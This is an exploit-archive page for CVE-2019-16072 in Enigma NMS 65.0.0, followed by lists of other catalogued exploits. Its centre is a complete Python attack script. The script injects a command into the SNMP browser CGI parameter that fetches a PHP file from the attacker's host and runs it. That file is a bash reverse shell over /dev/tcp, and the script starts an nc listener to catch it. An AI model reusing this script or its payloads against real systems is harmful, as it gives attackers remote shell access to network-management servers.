Menu

Search for hundreds of thousands of exploits

"Enigma NMS 65.0.0 - OS Command Injection"

Author

mark

Platform

multiple

Release date

2019-09-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")
	
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..." 

# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2007-03-21 "KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning" remote linux mark
2007-03-21 "Opera 9.x - FTP PASV Port-Scanning" remote linux mark
2007-03-21 "Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning" remote linux mark
2007-03-05 "KDE Konqueror 3.5 - JavaScript IFrame Denial of Service" dos linux mark
2007-03-05 "Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service" dos linux mark
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47364/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47364/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47364/41719/enigma-nms-6500-os-command-injection/download/", "exploit_id": "47364", "exploit_description": "\"Enigma NMS 65.0.0 - OS Command Injection\"", "exploit_date": "2019-09-09", "exploit_author": "mark", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse